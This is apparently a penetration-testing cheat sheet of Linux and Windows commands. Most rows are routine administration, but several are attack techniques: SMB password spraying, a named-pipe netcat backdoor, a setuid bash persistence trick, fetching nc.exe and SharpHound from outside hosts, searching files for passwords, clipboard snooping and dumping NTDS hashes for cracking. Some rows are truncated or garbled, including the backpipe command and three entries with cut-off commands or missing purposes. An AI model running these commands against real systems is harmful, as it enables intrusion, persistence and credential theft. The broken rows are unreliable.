# Linux

| Command | Purpose |
| --- | --- |
| `GREENIE=haha; export GREENIE` | Creates an environment variable named `GREENIE` with value `haha`, then exports it so that it is available to other programs |
| `PATH=$PATH:/root/haha` | Appends the folder `/root/haha` to the `PATH` environment variable while retaining the previous `PATH` value |
| `sort \| uniq -c \| sort -n` | Takes `stdin`, sorts it, counts the occurrences of each unique value, then sorts by the count in ascending order |
| `cat squid_access.log \| sort -k 2 \| head` | Reads `squid_access.log`, sorts it based on the second column, and displays the first 10 lines of the sorted output |
| `wc -l` | Counts the number of lines in a file or from `stdin` |
| `wc -c` | Counts the number of bytes in a file or from `stdin` |
| `wc -w` | Counts the number of words in a file or from `stdin` |
| `awk '{print $1,$4}'` | Prints the first and fourth fields of each line from `stdin` (field numbering starts at 1, not 0) |
| `awk '{print $(NF-1)}'` | Prints the second-to-last column from `stdin` |
| `awk '{print length, $1}'` | Prints the length of each line and the contents of the first field/column from `stdin` |
| `awk '{ sum += $1 } END { print sum }'` | Takes the lines from a file/`stdin` and adds up the values in the first field/column, acting as a quick and dirty calculator |
| `cat peptides.txt \| while read line; do echo $line; done` | Reads in each line from `peptides.txt`, then performs `echo` for each line |
| `cat users.txt \| while read i; do echo trying $i; smbmap -u "$i" -p "$i" -H 10.10.10.172; done` | Reads in each line from `users.txt`, then performs a password spraying attack on `10.10.10.172` using `smbmap` |
| `for i in {1..5}; do echo $i; done` | Loops from 1 to 5 and displays the value of `i` for each iteration |
| `for i in {000..999}; do echo KEY-HAHA-$i; done` | Creates a list of all values from `KEY-HAHA-000` to `KEY-HAHA-999` and displays each value |
| `TF=$(mktemp -d)` | Creates a temporary directory and assigns its path to a shell variable named `TF` |
| `${#TF}` | Expands to the length of the value stored in the variable `TF` |
| `sed 's/12/13/g'` | Replaces all instances of `12` with `13` in `stdin`; for example, `1234` becomes `1334` |
| `sed -i.bak '/line to delete/d' *` | Deletes a line of text from all files in a directory, keeping a `.bak` backup of each file |
| `xxd -p` | Prints only the hex of `stdin` or a file, without the hexdump format |
| `xxd -r` | Converts a hex dump from `stdin` back into binary; redirect the output to save it to a file |
| `tr -d '\r' \| tr -d '\n' \| xxd -r -p` | Takes hex input, removes carriage returns and newlines, and converts it back to binary (redirect the output to place it into a file) |
| `find / -user Matt 2>/dev/null` | Finds all files owned by `Matt` on the box, redirecting `stderr` to null |
| `find /etc -type f -name "apache2.*"` | Finds any file in `/etc` whose name begins with `apache2.` |
| `grep -E "(25[0-5]\|2[0-4][0-9]\|[01]?[0-9][0-9]?)\.(25[0-5]\|2[0-4][0-9]\|` | |
| `curl -d "param1=value&param2=value" https://example.com/resource.cgi` | Sends parameters in a POST request with `curl` |
| `date -d @1286536308` | Converts an epoch timestamp to `date` output |
| `mknod backpipe p; /bin/bash 0backpipe` | Creates a netcat backdoor without `-e` support |
| `tar -zcvf files.tar.gz /var/log/apache2` | Creates a `files.tar.gz` archive of all files in `/var/log/apache2` |
| `prips 10.10.10.0/24` | Prints all IPs in a specific subnet |
| `ifconfig eth0 169.254.0.1 netmask 255.255.0.0 broadcast 169.254.255.255` | Assigns an IP address to `eth0` from the terminal |
| `ifconfig eth0 down; ifconfig eth0 hw ether 00:11:22:33:44:55; ifconfig eth0 up` | Changes the MAC address for interface `eth0` |
| `dhclient eth0` | Requests a DHCP address on interface `eth0` |
| `dd if=./input.file of=./outfile` | Makes a bit-by-bit copy of a file or system |
| `sudo ln -s /usr/bin/python3 /usr/bin/python` | Creates a symbolic link so that `python` runs Python 3 |
| `sudo mkdir /mnt/new` | Creates a new directory `/mnt/new` with `sudo` permissions |
| `mount /dev/sdb1 /mnt/new` | Mounts the file system located at `/dev/sdb1` to the directory `/mnt/new` |
| `umount /dev/sdb1` | Unmounts the file system located at `/dev/sdb1` |
| `sudo route add -net default gw 10.10.0.1 netmask 0.0.0.0 dev wlan0 metric 1` | Adds another default route with metric 1 on `wlan0`, to choose a different interface to access the Internet |
| `sudo dhclient wlan0` | Requests a new DHCP lease on interface `wlan0` |
| `openssl enc -aes-256-cbc -salt -in file.txt -out file.txt.enc` | Encrypts a file with a password at the command line |
| `openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt` | Decrypts a file using a password at the command line |
| `sudo chmod +s /bin/bash`, then `bash -p` | Sets the setuid bit on `/bin/bash` on a machine; if root access is lost afterwards, `bash -p` gives a root shell |

---

# Windows

| Command | Purpose |
| --- | --- |
| `get-childitem -hidden` | Shows all hidden files in the current directory |
| `gci -recurse C:\ \| % { select-string -path $_ -pattern password} 2>$null` | |
| `1..255 \| % {ping -n1 192.168.0.$_ \|` | |
| `(New-Object System.Net.Webclient).DownloadFile("http://10.1.1.1:8000/nc.exe","C:\nc.exe")` | Downloads a file to the `C:\` location |
| `certutil -hashfile ntds.dit md5` | Hashes a file using MD5 |
| `certutil -encodehex ntds.dit ntds.hex` | Encodes a file as hexadecimal |
| `certutil -encode test.jpg test.base64` | Encodes a file as base64 |
| `certutil -decode test.base64 test.jpg` | Decodes a base64-encoded file |
| `iwr -uri http://10.10.14.27/SharpHound.ps1 -outfile SharpHound.ps1` | Downloads a file from another machine |
| `$x=""; while ($true) { $y=get-clipboard -raw; if ($x -ne $y) { write-host $y; $x=$y } }` | Monitors the clipboard and prints its contents to the screen |
| `ntdsutil; activate instance ntds; ifm; create full C:\ntds; quit; quit;` | Uses `ntdsutil` to obtain the `SYSTEM` registry hive and NTDS data as a backup, containing user hashes to crack |